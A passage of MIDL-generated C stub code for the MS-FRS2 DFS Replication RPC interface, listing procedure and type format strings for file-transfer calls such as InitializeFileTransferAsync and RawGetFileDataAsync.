*/ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 836 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure InitializeFileTransferAsync */ /* 838 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 840 */ NdrFcLong( 0x0 ), /* 0 */ /* 844 */ NdrFcShort( 0xd ), /* 13 */ /* 846 */ NdrFcShort( 0x68 ), /* X64 Stack size/offset = 104 */ /* 848 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 850 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 852 */ NdrFcShort( 0x6e ), /* 110 */ /* 854 */ NdrFcShort( 0x92 ), /* 146 */ /* 856 */ 0xc7, /* Oi2 Flags: srv must size, clt must size, has return, has ext, has async handle */ 0xb, /* 11 */ /* 858 */ 0xa, /* 10 */ 0x83, /* Ext Flags: new corr desc, clt corr check, has big amd64 byval param */ /* 860 */ NdrFcShort( 0x1 ), /* 1 */ /* 862 */ NdrFcShort( 0x0 ), /* 0 */ /* 864 */ NdrFcShort( 0x0 ), /* 0 */ /* 866 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 868 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 870 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 872 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 874 */ NdrFcShort( 0x11b ), /* Flags: must size, must free, in, out, simple ref, */ /* 876 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 878 */ NdrFcShort( 0x7c ), /* Type Offset=124 */ /* Parameter frsUpdate */ /* 880 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 882 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 884 */ NdrFcShort( 0x230 ), /* 560 */ /* Parameter rdcDesired */ /* 886 */ NdrFcShort( 0x2018 ), /* Flags: in, out, srv alloc size=8 */ /* 888 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 890 */ NdrFcShort( 0xcc ), /* Type Offset=204 */ /* Parameter stagingPolicy */ /* 892 */ NdrFcShort( 0x110 ), /* Flags: out, simple ref, */ /* 894 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ /* 896 */ NdrFcShort( 0x23e ), /* Type Offset=574 */ /* Parameter serverContext */ /* 898 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ /* 900 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 902 */ NdrFcShort( 0x242 ), /* Type Offset=578 */ /* Parameter rdcFileInfo */ /* 904 */ NdrFcShort( 0x113 ), /* Flags: must size, must free, out, simple ref, */ /* 906 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ /* 908 */ NdrFcShort( 0x2f0 ), /* Type Offset=752 */ /* Parameter dataBuffer */ /* 910 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 912 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ /* 914 */ NdrFcShort( 0x302 ), /* 770 */ /* Parameter bufferSize */ /* 916 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 918 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ /* 920 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter sizeRead */ /* 922 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 924 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */ /* 926 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter isEndOfFile */ /* 928 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 930 */ NdrFcShort( 0x60 ), /* X64 Stack size/offset = 96 */ /* 932 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure InitializeFileDataTransfer */ /* Return value */ /* 934 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 936 */ NdrFcLong( 0x0 ), /* 0 */ /* 940 */ NdrFcShort( 0xe ), /* 14 */ /* 942 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */ /* 944 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 946 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 948 */ NdrFcShort( 0x6c ), /* 108 */ /* 950 */ NdrFcShort( 0x78 ), /* 120 */ /* 952 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ 0xa, /* 10 */ /* 954 */ 0xa, /* 10 */ 0x83, /* Ext Flags: new corr desc, clt corr check, has big amd64 byval param */ /* 956 */ NdrFcShort( 0x1 ), /* 1 */ /* 958 */ NdrFcShort( 0x0 ), /* 0 */ /* 960 */ NdrFcShort( 0x0 ), /* 0 */ /* 962 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 964 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 966 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 968 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 970 */ NdrFcShort( 0x11b ), /* Flags: must size, must free, in, out, simple ref, */ /* 972 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 974 */ NdrFcShort( 0x7c ), /* Type Offset=124 */ /* Parameter frsUpdate */ /* 976 */ NdrFcShort( 0x110 ), /* Flags: out, simple ref, */ /* 978 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 980 */ NdrFcShort( 0x23e ), /* Type Offset=574 */ /* Parameter serverContext */ /* 982 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 984 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 986 */ 0xb, /* FC_HYPER */ 0x0, /* 0 */ /* Parameter offset */ /* 988 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 990 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 992 */ 0xb, /* FC_HYPER */ 0x0, /* 0 */ /* Parameter length */ /* 994 */ NdrFcShort( 0x113 ), /* Flags: must size, must free, out, simple ref, */ /* 996 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ /* 998 */ NdrFcShort( 0x310 ), /* Type Offset=784 */ /* Parameter dataBuffer */ /* 1000 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 1002 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 1004 */ NdrFcShort( 0x322 ), /* 802 */ /* Parameter bufferSize */ /* 1006 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 1008 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ /* 1010 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter sizeRead */ /* 1012 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 1014 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ /* 1016 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter isEndOfFile */ /* 1018 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 1020 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ /* 1022 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RawGetFileDataAsync */ /* Return value */ /* 1024 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 1026 */ NdrFcLong( 0x0 ), /* 0 */ /* 1030 */ NdrFcShort( 0xf ), /* 15 */ /* 1032 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 1034 */ 0x30, /* FC_BIND_CONTEXT */ 0x48, /* Ctxt flags: in, strict, */ /* 1036 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 1038 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 1040 */ NdrFcShort( 0x24 ), /* 36 */ /* 1042 */ NdrFcShort( 0x8 ), /* 8 */ /* 1044 */ 0xcc, /* Oi2 Flags: has return, has pipes, has ext, has async handle */ 0x3, /* 3 */ /* 1046 */ 0xa, /* 10 */ 0x1, /* Ext Flags: new corr desc, */ /* 1048 */ NdrFcShort( 0x0 ), /* 0 */ /* 1050 */ NdrFcShort( 0x0 ), /* 0 */ /* 1052 */ NdrFcShort( 0x0 ), /* 0 */ /* 1054 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter serverContext */ /* 1056 */ NdrFcShort( 0x8 ), /* Flags: in, */ /* 1058 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 1060 */ NdrFcShort( 0x1c8 ), /* Type Offset=456 */ /* Parameter bytePipe */ /* 1062 */ NdrFcShort( 0x4114 ), /* Flags: pipe, out, simple ref, srv alloc size=16 */ /* 1064 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 1066 */ NdrFcShort( 0x332 ), /* Type Offset=818 */ /* Return value */ /* 1068 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 1070 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 1072 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RdcGetFileDataAsync */ /* 1074 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 1076 */ NdrFcLong( 0x0 ), /* 0 */ /* 1080 */ NdrFcShort( 0x10 ), /* 16 */ /* 1082 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 1084 */ 0x30, /* FC_BIND_CONTEXT */ 0x48, /* Ctxt flags: in, strict, */ /* 1086 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 1088 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 1090 */ NdrFcShort( 0x24 ), /* 36 */ /* 1092 */ NdrFcShort( 0x8 ), /* 8 */ /* 1094 */ 0xcc, /* Oi2 Flags: has return, has pipes, has ext, has async handle */ 0x3, /* 3 */ /* 1096 */ 0xa, /* 10 */ 0x1, /* Ext Flags: new corr desc, */ /* 1098 */ NdrFcShort( 0x0 ), /* 0 */ /* 1100 */ NdrFcShort( 0x0 ), /* 0 */ /* 1102 */ NdrFcShort( 0x0 ), /* 0 */ /* 1104 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter serverContext */ /* 1106 */ NdrFcShort( 0x8 ), /* Flags: in, */ /* 1108 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 1110 */ NdrFcShort( 0x1c8 ), /* Type Offset=456 */ /* Parameter bytePipe */ /* 1112 */ NdrFcShort( 0x4114 ), /* Flags: pipe, out, simple ref, srv alloc size=16 */ /* 1114 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 1116 */ NdrFcShort( 0x340 ), /* Type Offset=832 */ /* Return value */ /* 1118 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 1120 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 1122 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ 0x0 } }; static const ms2Dfrs2_MIDL_TYPE_FORMAT_STRING ms2Dfrs2__MIDL_TypeFormatString = { 0, { NdrFcShort( 0x0 ), /* 0 */ /* 2 */ 0x11, 0x0, /* FC_RP */ /* 4 */ NdrFcShort( 0x8 ), /* Offset= 8 (12) */ /* 6 */ 0x1d, /* FC_SMFARRAY */ 0x0, /* 0 */ /* 8 */ NdrFcShort( 0x8 ), /* 8 */ /* 10 */ 0x1, /* FC_BYTE */ 0x5b, /* FC_END */ /* 12 */ 0x15, /* FC_STRUCT */ 0x3, /* 3 */ /* 14 */ NdrFcShort( 0x10 ), /* 16 */ /* 16 */ 0x8, /* FC_LONG */ 0x6, /* FC_SHORT */ /* 18 */ 0x6, /* FC_SHORT */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 20 */ 0x0, /* 0 */ NdrFcShort( 0xfff1 ), /* Offset= -15 (6) */ 0x5b, /* FC_END */ /* 24 */ 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ /* 26 */ 0x8, /* FC_LONG */ 0x5c, /* FC_PAD */ /* 28 */ 0xb7, /* FC_RANGE */ 0x8, /* 8 */ /* 30 */ NdrFcLong( 0x0 ), /* 0 */ /* 34 */ NdrFcLong( 0x100 ), /* 256 */ /* 38 */ 0xb7, /* FC_RANGE */ 0x8, /* 8 */ /* 40 */ NdrFcLong( 0x0 ), /* 0 */ /* 44 */ NdrFcLong( 0x1 ), /* 1 */ /* 48 */ 0xb7, /* FC_RANGE */ 0xd, /* 13 */ /* 50 */ NdrFcLong( 0x0 ), /* 0 */ /* 54 */ NdrFcLong( 0x2 ), /* 2 */ /* 58 */ 0x11, 0x0, /* FC_RP */ /* 60 */ NdrFcShort( 0xe ), /* Offset= 14 (74) */ /* 62 */ 0x15, /* FC_STRUCT */ 0x7, /* 7 */ /* 64 */ NdrFcShort( 0x20 ), /* 32 */ /* 66 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 68 */ NdrFcShort( 0xffc8 ), /* Offset= -56 (12) */ /* 70 */ 0xb, /* FC_HYPER */ 0xb, /* FC_HYPER */ /* 72 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 74 */ 0x21, /* FC_BOGUS_ARRAY */ 0x7, /* 7 */ /* 76 */ NdrFcShort( 0x0 ), /* 0 */ /* 78 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x0, /* */ /* 80 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 82 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ /* 84 */ NdrFcLong( 0xffffffff ), /* -1 */ /* 88 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 90 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 92 */ NdrFcShort( 0xffe2 ), /* Offset= -30 (62) */ /* 94 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 96 */ 0x11, 0x0, /* FC_RP */ /* 98 */ NdrFcShort( 0x54 ), /* Offset= 84 (182) */ /* 100 */ 0x15, /* FC_STRUCT */ 0x3, /* 3 */ /* 102 */ NdrFcShort( 0x8 ), /* 8 */ /* 104 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 106 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 108 */ 0x1d, /* FC_SMFARRAY */ 0x0, /* 0 */ /* 110 */ NdrFcShort( 0x14 ), /* 20 */ /* 112 */ 0x2, /* FC_CHAR */ 0x5b, /* FC_END */ /* 114 */ 0x1d, /* FC_SMFARRAY */ 0x0, /* 0 */ /* 116 */ NdrFcShort( 0x10 ), /* 16 */ /* 118 */ 0x2, /* FC_CHAR */ 0x5b, /* FC_END */ /* 120 */ 0x29, /* FC_WSTRING */ 0x5c, /* FC_PAD */ /* 122 */ NdrFcShort( 0x105 ), /* 261 */ /* 124 */ 0x1a, /* FC_BOGUS_STRUCT */ 0x7, /* 7 */ /* 126 */ NdrFcShort( 0x2b0 ), /* 688 */ /* 128 */ NdrFcShort( 0x0 ), /* 0 */ /* 130 */ NdrFcShort( 0x0 ), /* Offset= 0 (130) */ /* 132 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 134 */ 0x8, /* FC_LONG */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 136 */ 0x0, /* 0 */ NdrFcShort( 0xffdb ), /* Offset= -37 (100) */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 140 */ 0x0, /* 0 */ NdrFcShort( 0xffd7 ), /* Offset= -41 (100) */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 144 */ 0x0, /* 0 */ NdrFcShort( 0xffd3 ), /* Offset= -45 (100) */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 148 */ 0x0, /* 0 */ NdrFcShort( 0xff77 ), /* Offset= -137 (12) */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 152 */ 0x0, /* 0 */ NdrFcShort( 0xffd3 ), /* Offset= -45 (108) */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 156 */ 0x0, /* 0 */ NdrFcShort( 0xffd5 ), /* Offset= -43 (114) */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 160 */ 0x0, /* 0 */ NdrFcShort( 0xff6b ), /* Offset= -149 (12) */ 0xb, /* FC_HYPER */ /* 164 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 166 */ NdrFcShort( 0xff66 ), /* Offset= -154 (12) */ /* 168 */ 0xb, /* FC_HYPER */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 170 */ 0x0, /* 0 */ NdrFcShort( 0xff61 ), /* Offset= -159 (12) */ 0xb, /* FC_HYPER */ /* 174 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 176 */ NdrFcShort( 0xffc8 ), /* Offset= -56 (120) */ /* 178 */ 0x3e, /* FC_STRUCTPAD2 */ 0x8, /* FC_LONG */ /* 180 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 182 */ 0x21, /* FC_BOGUS_ARRAY */ 0x7, /* 7 */ /* 184 */ NdrFcShort( 0x0 ), /* 0 */ /* 186 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x0, /* */ /* 188 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 190 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ /* 192 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x54, /* FC_DEREFERENCE */ /* 194 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ /* 196 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 198 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 200 */ NdrFcShort( 0xffb4 ), /* Offset= -76 (124) */ /* 202 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 204 */ 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ /* 206 */ 0xd, /* FC_ENUM16 */ 0x5c, /* FC_PAD */ /* 208 */ 0x11, 0x4, /* FC_RP [alloced_on_stack] */ /* 210 */ NdrFcShort( 0xff3a ), /* Offset= -198 (12) */ /* 212 */ 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ /* 214 */ 0xb, /* FC_HYPER */ 0x5c, /* FC_PAD */ /* 216 */ 0xb7, /* FC_RANGE */ 0xd, /* 13 */ /* 218 */ NdrFcLong( 0x0 ), /* 0 */ /* 222 */ NdrFcLong( 0x2 ), /* 2 */ /* 226 */ 0xb7, /* FC_RANGE */ 0xd, /* 13 */ /* 228 */ NdrFcLong( 0x0 ), /* 0 */ /* 232 */ NdrFcLong( 0x2 ), /* 2 */ /* 236 */ 0x11, 0x4, /* FC_RP [alloced_on_stack] */ /* 238 */ NdrFcShort( 0x62 ), /* Offset= 98 (336) */ /* 240 */ 0x21, /* FC_BOGUS_ARRAY */ 0x7, /* 7 */ /* 242 */ NdrFcShort( 0x0 ), /* 0 */ /* 244 */ 0x19, /* Corr desc: field pointer, FC_ULONG */ 0x0, /* */ /* 246 */ NdrFcShort( 0x8 ), /* 8 */ /* 248 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ /* 250 */ NdrFcLong( 0xffffffff ), /* -1 */ /* 254 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 256 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 258 */ NdrFcShort( 0xff3c ), /* Offset= -196 (62) */ /* 260 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 262 */ 0x15, /* FC_STRUCT */ 0x1, /* 1 */ /* 264 */ NdrFcShort( 0x10 ), /* 16 */ /* 266 */ 0x6, /* FC_SHORT */ 0x6, /* FC_SHORT */ /* 268 */ 0x6, /* FC_SHORT */ 0x6, /* FC_SHORT */ /* 270 */ 0x6, /* FC_SHORT */ 0x6, /* FC_SHORT */ /* 272 */ 0x6, /* FC_SHORT */ 0x6, /* FC_SHORT */ /* 274 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 276 */ 0x15, /* FC_STRUCT */ 0x3, /* 3 */ /* 278 */ NdrFcShort( 0x20 ), /* 32 */ /* 280 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 282 */ NdrFcShort( 0xfef2 ), /* Offset= -270 (12) */ /* 284 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 286 */ NdrFcShort( 0xffe8 ), /* Offset= -24 (262) */ /* 288 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 290 */ 0x21, /* FC_BOGUS_ARRAY */ 0x3, /* 3 */ /* 292 */ NdrFcShort( 0x0 ), /* 0 */ /* 294 */ 0x19, /* Corr desc: field pointer, FC_ULONG */ 0x0, /* */ /* 296 */ NdrFcShort( 0x18 ), /* 24 */ /* 298 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ /* 300 */ NdrFcLong( 0xffffffff ), /* -1 */ /* 304 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 306 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 308 */ NdrFcShort( 0xffe0 ), /* Offset= -32 (276) */ /* 310 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 312 */ 0x1a, /* FC_BOGUS_STRUCT */ 0x7, /* 7 */ /* 314 */ NdrFcShort( 0x28 ), /* 40 */ /* 316 */ NdrFcShort( 0x0 ), /* 0 */ /* 318 */ NdrFcShort( 0xa ), /* Offset= 10 (328) */ /* 320 */ 0xb, /* FC_HYPER */ 0x8, /* FC_LONG */ /* 322 */ 0x40, /* FC_STRUCTPAD4 */ 0x36, /* FC_POINTER */ /* 324 */ 0x8, /* FC_LONG */ 0x40, /* FC_STRUCTPAD4 */ /* 326 */ 0x36, /* FC_POINTER */ 0x5b, /* FC_END */ /* 328 */ 0x12, 0x0, /* FC_UP */ /* 330 */ NdrFcShort( 0xffa6 ), /* Offset= -90 (240) */ /* 332 */ 0x12, 0x0, /* FC_UP */ /* 334 */ NdrFcShort( 0xffd4 ), /* Offset= -44 (290) */ /* 336 */ 0x1a, /* FC_BOGUS_STRUCT */ 0x7, /* 7 */ /* 338 */ NdrFcShort( 0x30 ), /* 48 */ /* 340 */ NdrFcShort( 0x0 ), /* 0 */ /* 342 */ NdrFcShort( 0x0 ), /* Offset= 0 (342) */ /* 344 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 346 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 348 */ NdrFcShort( 0xffdc ), /* Offset= -36 (312) */ /* 350 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 352 */ 0x11, 0x8, /* FC_RP [simple_pointer] */ /* 354 */ 0x8, /* FC_LONG */ 0x5c, /* FC_PAD */ /* 356 */ 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ /* 358 */ NdrFcShort( 0x2 ), /* Offset= 2 (360) */ /* 360 */ 0x12, 0x0, /* FC_UP */ /* 362 */ NdrFcShort( 0x2 ), /* Offset= 2 (364) */ /* 364 */ 0x1b, /* FC_CARRAY */ 0x0, /* 0 */ /* 366 */ NdrFcShort( 0x1 ), /* 1 */ /* 368 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x54, /* FC_DEREFERENCE */ /* 370 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ /* 372 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ /* 374 */ 0x1, /* FC_BYTE */ 0x5b, /* FC_END */ /* 376 */ 0x11, 0x0, /* FC_RP */ /* 378 */ NdrFcShort( 0x2 ), /* Offset= 2 (380) */ /* 380 */ 0x1a, /* FC_BOGUS_STRUCT */ 0x7, /* 7 */ /* 382 */ NdrFcShort( 0x318 ), /* 792 */ /* 384 */ NdrFcShort( 0x0 ), /* 0 */ /* 386 */ NdrFcShort( 0x0 ), /* Offset= 0 (386) */ /* 388 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 390 */ NdrFcShort( 0xfef6 ), /* Offset= -266 (124) */ /* 392 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 394 */ NdrFcShort( 0xfe82 ), /* Offset= -382 (12) */ /* 396 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 398 */ NdrFcShort( 0xfe7e ), /* Offset= -386 (12) */ /* 400 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 402 */ NdrFcShort( 0xfe7a ), /* Offset= -390 (12) */ /* 404 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 406 */ NdrFcShort( 0xfe76 ), /* Offset= -394 (12) */ /* 408 */ 0xb, /* FC_HYPER */ 0xb, /* FC_HYPER */ /* 410 */ 0xb, /* FC_HYPER */ 0x8, /* FC_LONG */ /* 412 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 414 */ 0x8, /* FC_LONG */ 0x5b, /* FC_END */ /* 416 */ 0x11, 0x4, /* FC_RP [alloced_on_stack] */ /* 418 */ NdrFcShort( 0x2 ), /* Offset= 2 (420) */ /* 420 */ 0x30, /* FC_BIND_CONTEXT */ 0xe9, /* Ctxt flags: via ptr, in, out, strict, can't be null */ /* 422 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 424 */ 0x11, 0x0, /* FC_RP */ /* 426 */ NdrFcShort( 0x2 ), /* Offset= 2 (428) */ /* 428 */ 0x1c, /* FC_CVARRAY */ 0x0, /* 0 */ /* 430 */ NdrFcShort( 0x1 ), /* 1 */ /* 432 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x0, /* */ /* 434 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 436 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 438 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x54, /* FC_DEREFERENCE */ /* 440 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 442 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 444 */ 0x1, /* FC_BYTE */ 0x5b, /* FC_END */ /* 446 */ 0xb7, /* FC_RANGE */ 0x8, /* 8 */ /* 448 */ NdrFcLong( 0x0 ), /* 0 */ /* 452 */ NdrFcLong( 0x40000 ), /* 262144 */ /* 456 */ 0x30, /* FC_BIND_CONTEXT */ 0x49, /* Ctxt flags: in, strict, can't be null */ /* 458 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 460 */ 0xb7, /* FC_RANGE */ 0x1, /* 1 */ /* 462 */ NdrFcLong( 0x1 ), /* 1 */ /* 466 */ NdrFcLong( 0x8 ), /* 8 */ /* 470 */ 0x11, 0x0, /* FC_RP */ /* 472 */ NdrFcShort( 0x2 ), /* Offset= 2 (474) */ /* 474 */ 0x1c, /* FC_CVARRAY */ 0x0, /* 0 */ /* 476 */ NdrFcShort( 0x1 ), /* 1 */ /* 478 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x0, /* */ /* 480 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 482 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 484 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x54, /* FC_DEREFERENCE */ /* 486 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 488 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 490 */ 0x1, /* FC_BYTE */ 0x5b, /* FC_END */ /* 492 */ 0xb7, /* FC_RANGE */ 0x8, /* 8 */ /* 494 */ NdrFcLong( 0x1 ), /* 1 */ /* 498 */ NdrFcLong( 0x10000 ), /* 65536 */ /* 502 */ 0x11, 0x0, /* FC_RP */ /* 504 */ NdrFcShort( 0xa ), /* Offset= 10 (514) */ /* 506 */ 0x15, /* FC_STRUCT */ 0x7, /* 7 */ /* 508 */ NdrFcShort( 0x10 ), /* 16 */ /* 510 */ 0xb, /* FC_HYPER */ 0xb, /* FC_HYPER */ /* 512 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 514 */ 0x21, /* FC_BOGUS_ARRAY */ 0x7, /* 7 */ /* 516 */ NdrFcShort( 0x0 ), /* 0 */ /* 518 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x0, /* */ /* 520 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 522 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 524 */ NdrFcLong( 0xffffffff ), /* -1 */ /* 528 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 530 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 532 */ NdrFcShort( 0xffe6 ), /* Offset= -26 (506) */ /* 534 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 536 */ 0xb7, /* FC_RANGE */ 0x8, /* 8 */ /* 538 */ NdrFcLong( 0x0 ), /* 0 */ /* 542 */ NdrFcLong( 0x14 ), /* 20 */ /* 546 */ 0xb7, /* FC_RANGE */ 0x8, /* 8 */ /* 548 */ NdrFcLong( 0x0 ), /* 0 */ /* 552 